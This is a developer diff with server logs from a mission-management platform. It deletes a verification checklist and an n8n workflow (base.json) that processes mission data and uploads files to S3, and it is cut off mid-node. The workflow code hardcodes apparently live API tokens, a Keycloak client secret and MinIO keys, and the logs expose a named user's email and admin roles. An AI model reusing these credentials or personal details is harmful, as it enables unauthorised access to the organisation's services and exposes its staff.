a.tmiri@clm.foundation -[LEANTIME_ADAPTER] Retrieved Leantime userId for email a.tmiri@clm.foundation: 2 -[LEANTIME_ADAPTER] Sending request to get all notifications -[LEANTIME_ADAPTER] Request body: {"jsonrpc":"2.0","method":"leantime.rpc.Notifications.Notifications.getAllNotifications","params":{"userId":2,"showNewOnly":0,"limitStart":0,"limitEnd":100,"filterOptions":[]},"id":1} -[LEANTIME_ADAPTER] Response status: 200 -[LEANTIME_ADAPTER] Raw response (truncated): {"jsonrpc":"2.0","result":[{"id":2732,"0":2732,"userId":2,"1":2,"read":0,"2":0,"type":"projectUpdate","3":"projectUpdate","module":"tickets","4":"tickets","moduleId":225,"5":225,"datetime":"2025-12-24... -[LEANTIME_ADAPTER] Parsed response data: { - hasResult: true, - resultIsArray: true, - resultLength: 100, - error: undefined -} -[LEANTIME_ADAPTER] Transformed notifications count: 100 -[LEANTIME_ADAPTER] Notification counts: { total: 100, unread: 66 } -[NOTIFICATION_SERVICE] Got count from leantime: { - total: 100, - unread: 66, - sources: { leantime: { total: 100, unread: 66 } } -} -[NOTIFICATION_SERVICE] Adding counts from leantime: total=100, unread=66 -[NOTIFICATION_SERVICE] Aggregated counts for user 203cbc91-61ab-47a2-95d2-b5e1159327d7: { - total: 100, - unread: 66, - sources: { leantime: { total: 100, unread: 66 } } -} -[NOTIFICATION_SERVICE] Cached notification counts for user 203cbc91-61ab-47a2-95d2-b5e1159327d7 -[IMAP POOL] Size: 0, Active: 0, Connecting: 0, Max: 20 -=== SESSION CALLBACK START === -Token error: undefined -Has accessToken: true -Has refreshToken: true -Token role: [ - 'expression', - 'entrepreneurship', - 'admin', - 'dataintelligence', - 'mediation', - 'mentors' -] -Token sub: 203cbc91-61ab-47a2-95d2-b5e1159327d7 -Token email: a.tmiri@clm.foundation -Token name: Amine TMIRI -Token username: aminetmiri -User roles for session: [ - 'expression', - 'entrepreneurship', - 'admin', - 'dataintelligence', - 'mediation', - 'mentors' -] -Creating session user object... -Setting session tokens... -✅ Session created successfully -Session user id: 203cbc91-61ab-47a2-95d2-b5e1159327d7 -Session user email: a.tmiri@clm.foundation -Session user roles: [ - 'expression', - 'entrepreneurship', - 'admin', - 'dataintelligence', - 'mediation', - 'mentors' -] -=== SESSION CALLBACK END === -Using cached messages data for user 203cbc91-61ab-47a2-95d2-b5e1159327d7 -[IMAP POOL] Size: 0, Active: 0, Connecting: 0, Max: 20 - diff --git a/VERIFY_INTEGRATION_IDS_SAVED.md b/VERIFY_INTEGRATION_IDS_SAVED.md deleted file mode 100644 index 36081b8..0000000 --- a/VERIFY_INTEGRATION_IDS_SAVED.md +++ /dev/null @@ -1,144 +0,0 @@ -# Verify Integration IDs Are Being Saved - -## 🔍 Current Status - -From your deletion logs, I can see: -- ✅ `API key present { present: true }` - N8N_API_KEY is now set! -- ✅ Deletion workflow executes successfully -- ⚠️ `hasRepoName: false` - Mission had no integration IDs - -**This suggests**: The mission was created **before** the fixes were applied, so it didn't have integration IDs. - ---- - -## ✅ Next Steps: Verify IDs Are Being Saved - -### Step 1: Create a New Mission - -1. Create a new mission via the frontend -2. Wait for N8N workflow to complete (30-60 seconds) -3. Check the server logs for: - ``` - Mission Created Webhook Received ← Should appear now! - Received mission-created data: { ... } - Found mission: { id: "...", name: "..." } - Updating giteaRepositoryUrl: ... - Updating leantimeProjectId: ... - Mission updated successfully - ``` - -### Step 2: Check Database - -**Query the database** to verify IDs are saved: - -```sql -SELECT - id, - name, - giteaRepositoryUrl, - leantimeProjectId, - outlineCollectionId, - rocketChatChannelId, - createdAt -FROM "Mission" -WHERE createdAt > NOW() - INTERVAL '1 hour' -ORDER BY createdAt DESC; -``` - -**Expected**: Recent missions should have integration IDs populated (not null). - -### Step 3: Check Server Logs During Creation - -**Look for these logs** when creating a mission: - -``` -Starting N8N workflow -POST /mission-created 200 ← N8N receiving webhook -Mission Created Webhook Received ← Our endpoint being called! ✅ -Received mission-created data: { ... } -Updating giteaRepositoryUrl: ... -Updating leantimeProjectId: ... -Mission updated successfully -``` - -**If you see "Mission Created Webhook Received"**: ✅ IDs are being saved! - -**If you DON'T see it**: ❌ N8N is still not calling the endpoint correctly. - ---- - -## 🧪 Test Checklist - -After creating a new mission: - -- [ ] Server logs show "Mission Created Webhook Received" -- [ ] Server logs show "Updating giteaRepositoryUrl" (if Gitea was created) -- [ ] Server logs show "Updating leantimeProjectId" (if Leantime was created) -- [ ] Server logs show "Updating outlineCollectionId" (if Outline was created) -- [ ] Server logs show "Updating rocketChatChannelId" (if RocketChat was created) -- [ ] Server logs show "Mission updated successfully" -- [ ] Database query shows non-null integration IDs -- [ ] Mission deletion receives non-empty IDs - ---- - -## 📊 Expected vs Actual - -### Expected (After Fix) - -**Mission Creation Logs**: -``` -Starting N8N workflow -POST /mission-created 200 -Mission Created Webhook Received ✅ -Received mission-created data: { missionId: "...", ... } -Updating giteaRepositoryUrl: https://gite.slm-lab.net/alma/repo-name -Updating leantimeProjectId: 123 -Mission updated successfully -``` - -**Database**: -``` -giteaRepositoryUrl: "https://gite.slm-lab.net/alma/repo-name" -leantimeProjectId: "123" -outlineCollectionId: "collection-456" -rocketChatChannelId: "channel-789" -``` - -**Mission Deletion**: -``` -hasRepoName: true ✅ -leantimeProjectId: 123 ✅ -documentationCollectionId: "collection-456" ✅ -rocketchatChannelId: "channel-789" ✅ -``` - -### Actual (From Your Logs) - -**Mission Deletion**: -``` -hasRepoName: false ❌ (Mission created before fix) -``` - ---- - -## 🎯 Action Required - -**Create a NEW mission** and check: - -1. **Server logs** during creation - should show "Mission Created Webhook Received" -2. **Database** after creation - should have integration IDs -3. **Deletion logs** - should show non-empty IDs - -If the new mission has IDs saved, then the fix is working! ✅ - -If not, we need to check: -- N8N workflow configuration -- N8N execution logs -- Server logs for errors - ---- - -**Document Created**: $(date) -**Status**: Waiting for verification that new missions have IDs saved - diff --git a/base.json b/base.json deleted file mode 100644 index 9146f1f..0000000 --- a/base.json +++ /dev/null @@ -1,1019 +0,0 @@ -{ - "name": "base", - "nodes": [ - { - "parameters": { - "jsCode": "const missionData = $input.item.json;\nconst binaryData = $input.item.binary;\n\n// Add detailed logging\nconsole.log('Process Mission Data - Input:', {\n hasInput: !!missionData,\n hasBinary: !!binaryData,\n hasBody: !!missionData?.body,\n hasLogo: !!missionData?.logo,\n hasAttachments: Array.isArray(missionData?.attachments),\n attachmentsCount: missionData?.attachments?.length || 0,\n logoDataType: typeof missionData?.logo,\n logoData: missionData?.logo ? 'present' : 'missing',\n contentType: missionData?.missionOriginal?.headers?.['content-type'] || 'unknown',\n binaryKeys: binaryData ? Object.keys(binaryData) : [],\n binaryDataTypes: binaryData ? Object.keys(binaryData).map(key => typeof binaryData[key]?.data) : [],\n creatorId: missionData?.creatorId || 'missing'\n});\n\n// Add detailed logging for services\nconsole.log('Process Mission Data - Services:', {\n originalServices: missionData?.missionOriginal?.body?.services,\n bodyServices: missionData?.body?.services,\n directServices: missionData?.services,\n finalServices: missionData?.missionOriginal?.body?.services || missionData?.body?.services || missionData?.services || []\n});\n\n// Handle raw file input\nif (missionData?.missionOriginal?.headers?.['content-type']?.startsWith('image/')) {\n console.log('Detected raw image file input');\n \n // Get binary data from the first available key\n const binaryKey = Object.keys(binaryData || {})[0];\n const rawData = binaryKey ? binaryData[binaryKey]?.data : null;\n \n if (!rawData) {\n console.error('No binary data found in raw file input');\n throw new Error('No binary data found in raw file input');\n }\n \n // Ensure rawData is a Buffer\n const buffer = Buffer.isBuffer(rawData) ? rawData : Buffer.from(rawData);\n \n // Convert raw data to base64\n const base64Data = buffer.toString('base64');\n const mimeType = missionData.missionOriginal.headers['content-type'];\n \n // Create mission data structure\n return {\n missionOriginal: missionData,\n missionProcessed: {\n name: \"Unnamed Mission\",\n sanitizedName: \"unnamed-mission\",\n intention: \"\",\n description: \"Mission documentation\",\n startDate: new Date().toISOString().split('T')[0],\n endDate: new Date(Date.now() + 30 * 24 * 60 * 60 * 1000).toISOString().split('T')[0],\n missionType: \"default\",\n guardians: {},\n volunteers: [],\n profils: [],\n services: [],\n clientId: 2,\n rocketChatUsernames: [],\n logo: {\n data: `data:${mimeType};base64,${base64Data}`,\n name: \"logo.png\",\n type: mimeType\n },\n attachments: []\n },\n config: {\n GITEA_API_URL: \"https://gite.slm-lab.net/api/v1\",\n GITEA_API_TOKEN: \"310645d564cbf752be1fe3b42582a3d5f5d0bddd\",\n GITEA_OWNER: \"alma\",\n LEANTIME_API_URL: \"https://agilite.slm-lab.net\",\n LEANTIME_API_TOKEN: \"lt_lsdShQdoYHaPUWuL07XZR1Rf3GeySsIs_UDlll3VJPk5EwAuILpMC4BwzJ9MZFRrb\",\n ROCKETCHAT_API_URL: \"https://parole.slm-lab.net/\",\n ROCKETCHAT_AUTH_TOKEN: \"w91TYgkH-Z67Oz72usYdkW5TZLLRwnre7qyAhp7aHJB\",\n ROCKETCHAT_USER_ID: \"Tpuww59PJKsrGNQJB\",\n OUTLINE_API_URL: \"https://chapitre.slm-lab.net/api\",\n OUTLINE_API_TOKEN: \"ol_api_tlLlANBfcoJ4l7zA8GOcpduAeL6QyBTcYvEnlN\",\n MISSION_API_URL: \"https://hub.slm-lab.net\",\n N8N_API_KEY: \"LwgeE1ntADD20OuWC88S3pR0EaO7FtO4\",\n KEYCLOAK_BASE_URL: \"https://connect.slm-lab.net\",\n KEYCLOAK_REALM: \"cercle\",\n KEYCLOAK_CLIENT_ID: \"lab\",\n KEYCLOAK_CLIENT_SECRET: \"LwgeE1ntADD20OuWC88S3P0EaO7FtO4\",\n MINIO_API_URL: \"https://dome-api.slm-lab.net\",\n MINIO_ACCESS_KEY: \"4aBT4CMb7JIMMyUtp4Pl\",\n MINIO_SECRET_KEY: \"HGn39XhCIlqOjmDVzRK9MED2Fci2rYvDDgbLFElg\"\n },\n binary: {\n data: buffer\n },\n creatorId: missionData?.creatorId || missionData?.missionOriginal?.body?.creatorId || missionData?.body?.creatorId\n };\n}\n\n// Continue with existing JSON processing\nconst sanitizeName = (name) => {\n if (!name || typeof name !== \"string\") return \"unnamed-mission\";\n return name.toLowerCase()\n .split(\"\")\n .map(c => {\n if (c >= \"a\" && c <= \"z\") return c;\n if (c >= \"0\" && c <= \"9\") return c;\n if (c === \" \" || c === \"-\") return c;\n return \"\";\n })\n .join(\"\")\n .split(\" \")\n .filter(Boolean)\n .join(\"-\");\n};\nconst formatDate = (date) => {\n if (!date) return \"\";\n const d = new Date(date);\n return d.toISOString().split(\"T\")[0];\n};\nconst missionName = missionData?.missionOriginal?.body?.name || missionData?.body?.name || missionData?.name || \"Unnamed Mission\";\n\n// Prepare file data for MinIO\nconst prepareFileData = (file) => {\n if (!file) {\n // Return default logo if no file provided\n return {\n data: \"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNk+A8AAQUBAScY42YAAAAASUVORK5CYII=\",\n name: \"default-logo.png\",\n type: \"image/png\"\n };\n }\n \n // Handle different file formats\n if (typeof file === \"string\") {\n return {\n data: file,\n name: \"logo.png\",\n type: \"image/png\"\n };\n }\n \n if (typeof file === \"object\") {\n // Handle binary data\n if (file.data && typeof file.data === \"object\" && file.data.data) {\n return {\n data: file.data.data,\n name: file.name || \"logo.png\",\n type: file.type || \"image/png\"\n };\n }\n \n // Handle base64 data\n if (file.data && typeof file.data === \"string\") {\n return {\n data: file.data,\n name: file.name || \"logo.png\",\n type: file.type || \"image/png\"\n };\n }\n \n // Handle direct object\n return {\n data: file,\n name: file.name || \"logo.png\",\n type: file.type || \"image/png\"\n };\n }\n \n return null;\n};\n\nconst output = {\n missionOriginal: missionData,\n missionProcessed: {\n name: missionName,\n sanitizedName: sanitizeName(missionName),\n intention: missionData?.missionOriginal?.body?.intention || missionData?.body?.intention || missionData?.intention || \"\",\n description: missionData?.missionOriginal?.body?.intention || missionData?.body?.intention || missionData?.intention || \"Mission documentation\",\n startDate: formatDate(new Date()),\n endDate: formatDate(new Date(Date.now() + 30 * 24 * 60 * 60 * 1000)),\n missionType: missionData?.missionOriginal?.body?.missionType || missionData?.body?.missionType || missionData?.missionType || \"default\",\n guardians: missionData?.missionOriginal?.body?.guardians || missionData?.body?.guardians || missionData?.guardians || {},\n volunteers: missionData?.missionOriginal?.body?.volunteers || missionData?.body?.volunteers || missionData?.volunteers || [],\n profils: missionData?.missionOriginal?.body?.profils || missionData?.body?.profils || missionData?.profils || [],\n services: missionData?.missionOriginal?.body?.services || missionData?.body?.services || missionData?.services || [],\n clientId: (missionData?.missionOriginal?.body?.missionType === \"interne\" || missionData?.body?.missionType === \"interne\" || missionData?.missionType === \"interne\") ? 1 : 2,\n rocketChatUsernames: [],\n logo: prepareFileData(missionData?.logo),\n attachments: Array.isArray(missionData?.attachments) ? missionData.attachments.map(prepareFileData).filter(Boolean) : []\n },\n config: {\n GITEA_API_URL: \"https://gite.slm-lab.net/api/v1\",\n GITEA_API_TOKEN: \"310645d564cbf752be1fe3b42582a3d5f5d0bddd\",\n GITEA_OWNER: \"alma\",\n LEANTIME_API_URL: \"https://agilite.slm-lab.net\",\n LEANTIME_API_TOKEN: \"lt_lsdShQdoYHaPUWuL07XZR1Rf3GeySsIs_UDlll3VJPk5EwAuILpMC4BwzJ9MZFRrb\",\n ROCKETCHAT_API_URL: \"https://parole.slm-lab.net/\",\n ROCKETCHAT_AUTH_TOKEN: \"w91TYgkH-Z67Oz72usYdkW5TZLLRwnre7qyAhp7aHJB\",\n ROCKETCHAT_USER_ID: \"Tpuww59PJKsrGNQJB\",\n OUTLINE_API_URL: \"https://chapitre.slm-lab.net/api\",\n OUTLINE_API_TOKEN: \"ol_api_tlLlANBfcoJ4l7zA8GOcpduAeL6QyBTcYvEnlN\",\n MISSION_API_URL: \"https://hub.slm-lab.net\",\n N8N_API_KEY: \"LwgeE1ntADD20OuWC88S3pR0EaO7FtO4\",\n KEYCLOAK_BASE_URL: \"https://connect.slm-lab.net\",\n KEYCLOAK_REALM: \"cercle\",\n KEYCLOAK_CLIENT_ID: \"lab\",\n KEYCLOAK_CLIENT_SECRET: \"LwgeE1ntADD20OuWC88S3P0EaO7FtO4\",\n MINIO_API_URL: \"https://dome-api.slm-lab.net\",\n MINIO_ACCESS_KEY: \"4aBT4CMb7JIMMyUtp4Pl\",\n MINIO_SECRET_KEY: \"HGn39XhCIlqOjmDVzRK9MED2Fci2rYvDDgbLFElg\"\n },\n creatorId: missionData?.creatorId || missionData?.missionOriginal?.body?.creatorId || missionData?.body?.creatorId || missionData?.missionOriginal?.creatorId || missionData?.missionProcessed?.creatorId\n};\n\n// Add binary data to output if available\nif (binaryData) {\n const binaryKey = Object.keys(binaryData)[0];\n if (binaryKey && binaryData[binaryKey]?.data) {\n // Ensure the data is a Buffer\n const data = binaryData[binaryKey].data;\n output.binary = {\n data: Buffer.isBuffer(data) ? data : Buffer.from(data)\n };\n }\n}\n\nconst guardians = missionData?.missionOriginal?.body?.guardians || missionData?.body?.guardians || missionData?.guardians || {};\nif (guardians) {\n for (const role in guardians) {\n const user = guardians[role];\n if (user) output.missionProcessed.rocketChatUsernames.push(user);\n }\n}\nconst volunteers = missionData?.missionOriginal?.body?.volunteers || missionData?.body?.volunteers || missionData?.volunteers || [];\nif (Array.isArray(volunteers)) {\n output.missionProcessed.rocketChatUsernames.push(...volunteers);\n}\noutput.missionProcessed.rocketChatUsernames = [...new Set(output.missionProcessed.rocketChatUsernames)];\n\n// Ensure binary data is always available\nif (!output.binary || !output.binary.data) {\n console.log('No binary data found, using default PNG');\n output.binary = {\n data: Buffer.from(\"iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNk+A8AAQUBAScY42YAAAAASUVORK5CYII=\", 'base64')\n };\n}\n\n// Log the final output\nconsole.log('Process Mission Data - Final Output:', {\n services: output.missionProcessed.services,\n isArray: Array.isArray(output.missionProcessed.services),\n containsGite: Array.isArray(output.missionProcessed.services) && output.missionProcessed.services.includes('Gite')\n});\n\nreturn output;" - }, - "name": "Process Mission Data", - "type": "n8n-nodes-base.code", - "typeVersion": 2, - "position": [ - -1040, - 600 - ], - "id": "3f2bd512-63d6-4bbe-8e41-c4ef92647562" - }, - { - "parameters": { - "functionCode": "const input = $input.item.json;\nconst binaryData = $input.item.binary;\n\n// Detailed input tracing\nconsole.log(\"Decode Logo Data - Detailed Input Trace:\", {\n // Input structure\n hasInput: !!input,\n inputType: typeof input,\n inputKeys: input ? Object.keys(input) : [],\n \n // Binary data\n hasBinary: !!binaryData,\n binaryType: typeof binaryData,\n binaryKeys: binaryData ? Object.keys(binaryData) : [],\n \n // Mission data\n hasMissionProcessed: !!input?.missionProcessed,\n missionProcessedKeys: input?.missionProcessed ? Object.keys(input.missionProcessed) : [],\n \n // Logo data\n hasLogo: !!input?.missionProcessed?.logo,\n logoType: typeof input?.missionProcessed?.logo,\n logoKeys: input?.missionProcessed?.logo ? Object.keys(input.missionProcessed.logo) : [],\n \n // Headers\n hasHeaders: !!input?.missionOriginal?.headers,\n contentType: input?.missionOriginal?.headers?.['content-type'],\n contentDisposition: input?.missionOriginal?.headers?.['content-disposition']\n});\n\n// Default transparent PNG base64 (1x1 pixel)\nconst DEFAULT_PNG = \"iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNk+A8AAQUBAScY42YAAAAASUVORK5CYII=\";\n\n// Helper function to create a valid buffer with detailed logging\nconst createValidBuffer = (data, source) => {\n console.log(`Creating buffer from ${source}:`, {\n dataType: typeof data,\n isBuffer: Buffer.isBuffer(data),\n isString: typeof data === 'string',\n isObject: typeof data === 'object',\n hasData: data?.data ? 'yes' : 'no'\n });\n \n try {\n if (!data) {\n console.log(`${source}: No data provided`);\n return null;\n }\n \n // If it's already a buffer, return it\n if (Buffer.isBuffer(data)) {\n console.log(`${source}: Data is already a buffer`);\n return data;\n }\n \n // If it's a string, try to create a buffer\n if (typeof data === 'string') {\n // Check if it's base64\n if (data.includes(',')) {\n console.log(`${source}: Converting base64 string to buffer`);\n const base64Data = data.split(',')[1];\n return Buffer.from(base64Data, 'base64');\n }\n // Try as raw string\n console.log(`${source}: Converting raw string to buffer`);\n return Buffer.from(data);\n }\n \n // If it's an object with data property\n if (data && typeof data === 'object' && data.data) {\n console.log(`${source}: Converting object with data property`);\n return createValidBuffer(data.data, `${source}.data`);\n }\n \n console.log(`${source}: Could not create buffer from data`);\n return null;\n } catch (e) {\n console.error(`Error creating buffer from ${source}:`, e);\n return null;\n }\n};\n\n// Try to get binary data with detailed logging\nconst getBinaryData = () => {\n // First try: Check raw binary data\n if (binaryData) {\n console.log('Checking raw binary data...');\n const binaryKey = Object.keys(binaryData)[0];\n if (binaryKey && binaryData[binaryKey]?.data) {\n const buffer = createValidBuffer(binaryData[binaryKey].data, 'raw binary');\n if (buffer) {\n console.log('Successfully created buffer from raw binary data');\n return {\n buffer,\n fileName: input.missionOriginal?.headers?.['content-disposition']?.split('filename=')[1] || 'logo.png',\n mimeType: input.missionOriginal?.headers?.['content-type'] || 'image/png'\n };\n }\n }\n }\n \n // Second try: Check mission processed logo\n console.log('Checking mission processed logo...');\n const logo = input?.missionProcessed?.logo || input?.body?.logo || input?.logo;\n if (logo?.data) {\n const buffer = createValidBuffer(logo.data, 'mission logo');\n if (buffer) {\n console.log('Successfully created buffer from mission logo');\n return {\n buffer,\n fileName: logo.name || 'logo.png',\n mimeType: logo.type || 'image/png'\n };\n }\n }\n \n // Third try: Check if input is raw binary\n console.log('Checking if input is raw binary...');\n if (input && typeof input === 'object' && !input.missionProcessed) {\n const buffer = createValidBuffer(input, 'raw input');\n if (buffer) {\n console.log('Successfully created buffer from raw input');\n return {\n buffer,\n fileName: 'logo.png',\n mimeType: 'image/png'\n };\n }\n }\n \n // Fallback to default\n console.log('No valid binary data found, using default PNG');\n return {\n buffer: Buffer.from(DEFAULT_PNG, 'base64'),\n fileName: 'default-logo.png',\n mimeType: 'image/png'\n };\n};\n\n// Get the binary data with all fallbacks\nconst { buffer, fileName, mimeType } = getBinaryData();\n\n// Validate buffer before creating output\nif (!buffer || !Buffer.isBuffer(buffer)) {\n console.error('Invalid buffer created, forcing default');\n const defaultBuffer = Buffer.from(DEFAULT_PNG, 'base64');\n \n return {\n json: {\n ...input,\n fileName: 'default-logo.png',\n mimeType: 'image/png',\n sanitizedName: input?.missionProcessed?.sanitizedName || \"unnamed-mission\",\n logoProcessed: true,\n forcedDefault: true\n },\n binary: {\n data: defaultBuffer\n }\n };\n}\n\n// Create output with both json and binary data in the correct structure\nconst output = {\n json: {\n ...input,\n fileName,\n mimeType,\n sanitizedName: input?.missionProcessed?.sanitizedName || \"unnamed-mission\",\n logoProcessed: true,\n bufferSize: buffer.length\n },\n binary: {\n data: buffer\n }\n};\n\n// Log the output for debugging\nconsole.log(\"Decode Logo Data - Final Output:\", {\n fileName: output.json.fileName,\n mimeType: output.json.mimeType,\n bufferSize: output.json.bufferSize,\n hasBinaryData: !!output.binary?.data,\n binaryDataType: typeof output.binary?.data,\n isBuffer: Buffer.isBuffer(output.binary?.data)\n});\n\n// Ensure binary data is always available\nif (!output.binary || !output.binary.data) {\n console.error('Binary data missing in output, forcing default');\n output.binary = {\n data: Buffer.from(DEFAULT_PNG, 'base64')\n };\n}\n\nreturn output;" - }, - "name": "Decode Logo Data", - "type": "n8n-nodes-base.function", - "typeVersion": 1, - "position": [ - -840, - 480 - ], - "id": "d53a9001-27a7-4dec-b083-962771610fad" - }, - { - "parameters": { - "functionCode": "// Process attachments for S3 upload with improved error handling\nconst input = $input.item.json;\nconst attachments = input?.missionProcessed?.attachments || [];\n\n// Create a default output with a flag indicating if there are attachments\nconst defaultOutput = {\n json: {\n ...input,\n hasAttachments: false,\n attachmentUrls: [], // Initialize empty array for consistency\n skipIntegrations: false // Add flag to control integration flow\n }\n};\n\n// If no attachments or invalid input, return default output and skip S3 node\nif (!input || !Array.isArray(attachments) || attachments.length === 0) {\n console.log('No attachments found or invalid input structure');\n return defaultOutput;\n}\n\n// Process the first attachment to check if it's valid\nlet hasValidAttachments = false;\nlet validAttachments = [];\n\n// Check all attachments for validity\ntry {\n for (const attachment of attachments) {\n if (attachment && attachment.data) {\n // Extract pure base64 (remove data:image/... prefix if present)\n let base64Data = attachment.data;\n if (typeof base64Data === 'string' && base64Data.includes(',')) {\n base64Data = base64Data.split(',')[1];\n }\n \n // If we have valid data, mark as valid and include in valid attachments\n if (base64Data && base64Data.trim() !== '') {\n try {\n // Test if it's valid base64 by creating a buffer\n const testBuffer = Buffer.from(base64Data, 'base64');\n if (testBuffer.length > 0) {\n hasValidAttachments = true;\n validAttachments.push({\n data: base64Data,\n name: attachment.name || `attachment-${validAttachments.length}.png`,\n type: attachment.type || 'application/octet-stream'\n });\n }\n } catch (e) {\n console.log(`Skipping invalid attachment: ${e.message}`);\n // Skip this attachment but continue processing others\n }\n }\n }\n }\n} catch (error) {\n // If any error in the loop, log it but don't fail the workflow\n console.error('Error checking attachment validity:', error);\n}\n\n// If no valid attachments after checking, return the default output\nif (!hasValidAttachments || validAttachments.length === 0) {\n console.log('No valid attachments found after validation');\n return defaultOutput;\n}\n\n// At this point, we know we have at least one valid attachment\n// Prepare the output with attachment info\nreturn {\n json: {\n ...input,\n hasAttachments: true,\n attachmentCount: validAttachments.length,\n attachmentData: validAttachments,\n originalAttachmentsCount: attachments.length,\n skipIntegrations: false // Ensure integrations run\n }\n};" - }, - "name": "Check Attachments", - "type": "n8n-nodes-base.function", - "typeVersion": 1, - "position": [ - -840, - 740 - ], - "id": "338e7b89-639a-4df6-bbbd-f8ddfebaec70" - }, - { - "parameters": { - "conditions": { - "boolean": [ - { - "value1": "={{ $json.hasAttachments }}", - "value2": true - } - ] - } - }, - "name": "IF Has Attachments", - "type": "n8n-nodes-base.if", - "typeVersion": 1, - "position": [ - -620, - 740 - ], - "id": "d451be7e-c2a7-4bf8-aea0-5793933799a3" - }, - { - "parameters": { - "functionCode": "// Process single attachment for S3 upload with improved error handling\nconst input = $input.item.json;\n\n// Log for debugging\nconsole.log('Process Attachment Data input:', {\n hasInput: !!input,\n hasAttachmentData: !!input?.attachmentData,\n attachmentDataLength: input?.attachmentData?.length || 0,\n attachmentData: input?.attachmentData ? 'present' : 'missing'\n});\n\n// Create array to hold processed attachments\nconst outputs = [];\n\n// Early return if no attachment data to prevent race conditions\nif (!Array.isArray(input?.attachmentData) || input.attachmentData.length === 0) {\n console.log('No valid attachment data found, returning placeholder');\n return [{ \n json: { \n ...input,\n processingFailed: true,\n reason: 'No valid attachments to process'\n } \n }];\n}\n\n// Process each attachment\ninput.attachmentData.forEach((attachment, index) => {\n try {\n if (!attachment || !attachment.data) {\n console.log(`Skipping attachment ${index}: No data`);\n return;\n }\n \n // Extract pure base64 (remove data:image/... prefix if present)\n let base64Data = attachment.data;\n if (typeof base64Data === 'string' && base64Data.includes(',')) {\n base64Data = base64Data.split(',')[1];\n }\n \n // Skip if no valid base64 data\n if (!base64Data || base64Data.trim() === '') {\n console.log(`Skipping attachment ${index}: Empty data`);\n return;\n }\n \n try {\n // Verify the base64 data is valid\n const buffer = Buffer.from(base64Data, 'base64');\n \n if (buffer.length === 0) {\n console.log(`Skipping attachment ${index}: Empty buffer`);\n return;\n }\n \n // Create output for this attachment\n outputs.push({\n json: {\n ...input,\n fileName: attachment.name || `attachment-${index}.${attachment.type?.split('/')[1] || 'bin'}`,\n mimeType: attachment.type || 'application/octet-stream',\n index: index,\n totalAttachments: input.attachmentData.length,\n missionId: input.missionProcessed?.sanitizedName || 'unnamed-mission',\n attachmentProcessed: true\n },\n binary: {\n data: buffer\n }\n });\n \n console.log(`Successfully processed attachment ${index}: ${attachment.name}`);\n } catch (e) {\n console.error(`Failed to create buffer for attachment ${index}:`, e);\n }\n } catch (error) {\n // Skip failed attachments but log the error\n console.error(`Failed to process attachment ${index}:`, error);\n }\n});\n\n// Return processed attachments or a placeholder if none processed\nif (outputs.length > 0) {\n console.log(`Successfully processed ${outputs.length} attachments`);\n return outputs;\n} else {\n console.log('No attachments were successfully processed');\n return [{ \n json: { \n ...input,\n processingFailed: true,\n reason: 'All attachments failed processing'\n } \n }];\n}" - }, - "name": "Process Attachment Data", - "type": "n8n-nodes-base.function", - "typeVersion": 1, - "position": [ - -440, - 680 - ], - "id": "34cd0412-01da-446d-aafd-8762358766c4" - }, - { - "parameters": { - "operation": "upload", - "bucketName": "=missions", - "fileName": "={{$input.item.json.sanitizedName}}/logo.png", - "additionalFields": { - "acl": "public-read" - } - }, - "id": "d469dea0-f1bd-4896-a385-88194bc28b94", - "name": "S3 Upload Logo", - "type": "n8n-nodes-base.s3", - "typeVersion": 1, - "position": [ - -500, - 480 - ], - "credentials": { - "s3": { - "id": "xvSkHfsTBJxzopIj", - "name": "S3 account 2" - } - }, - "continueOnFail": true - }, - { - "parameters": { - "functionCode": "// Debug node to ensure binary data is properly structured\nconst input = $input.item;\n\n// Log the full input structure\nconsole.log('Debug - Input structure:', {\n hasJson: !!input.json,\n hasBinary: !!input.binary,\n hasBinaryData: !!input.binary?.data,\n binaryDataType: typeof input.binary?.data,\n isBuffer: Buffer.isBuffer(input.binary?.data),\n jsonKeys: input.json ? Object.keys(input.json) : [],\n binaryKeys: input.binary ? Object.keys(input.binary) : []\n});\n\n// Ensure binary data is properly structured\nif (!input.binary?.data) {\n console.error('No binary data found in input');\n throw new Error('No binary data found in input');\n}\n\n// Return the input unchanged\nreturn input;" - }, - "name": "Debug Binary Data", - "type": "n8n-nodes-base.function", - "typeVersion": 1, - "position": [ - -720, - 480 - ], - "id": "3162b0d4-8947-4d1b-bd38-4cc0ba89dd08" - }, - { - "parameters": { - "functionCode": "// Generate empty attachment result when there are no attachments\nconst input = $input.item.json;\n\n// Return input with empty attachment urls and skip integrations flag\nreturn {\n json: {\n ...input,\n attachmentUrls: [],\n noAttachments: true,\n skipIntegrations: true // Skip integrations for this path\n }\n};" - }, - "name": "Empty Attachment Result", - "type": "n8n-nodes-base.function", - "typeVersion": 1, - "position": [ - -320, - 880 - ], - "id": "781e38e6-f13d-4b47-a6a7-e081a5ad6a75" - }, - { - "parameters": { - "functionCode": "// Process upload results and prepare for integrations\nconst input = $input.item.json;\n\n// Log the input for debugging\nconsole.log('Process Upload Results - Input:', {\n hasInput: !!input,\n hasAttachments: input?.hasAttachments,\n logoUrl: input?.logoUrl,\n attachmentUrls: input?.attachmentUrls,\n skipIntegrations: input?.skipIntegrations\n});\n\n// Determine if we should run integrations\nconst shouldRunIntegrations = !input?.skipIntegrations;\n\n// Create the output with all necessary data\nconst output = {\n ...input,\n logoUrl: input?.logoUrl || '',\n attachmentUrls: Array.isArray(input?.attachmentUrls) ? input.attachmentUrls : [],\n hasAttachments: !!input?.hasAttachments,\n skipIntegrations: !shouldRunIntegrations\n};\n\n// Log the output for debugging\nconsole.log('Process Upload Results - Output:', {\n hasLogoUrl: !!output.logoUrl,\n attachmentUrlsCount: output.attachmentUrls.length,\n hasAttachments: output.hasAttachments,\n skipIntegrations: output.skipIntegrations\n});\n\nreturn { json: output };" - }, - "name": "Process Upload Results", - "type": "n8n-nodes-base.function", - "typeVersion": 1, - "position": [ - -60, - 780 - ], - "id": "5f18399b-670d-4bf6-bd5c-0cde13908c1d" - }, - { - "parameters": { - "method": "POST", - "url": "={{ $node['Process Mission Data'].json.config.KEYCLOAK_BASE_URL + '/realms/' + $node['Process Mission Data'].json.config.KEYCLOAK_REALM + '/protocol/openid-connect/token' }}", - "sendHeaders": true, - "headerParameters": { - "parameters": [ - { - "name": "Content-Type", - "value": "application/x-www-form-urlencoded" - } - ] - }, - "sendBody": true, - "bodyParameters": { - 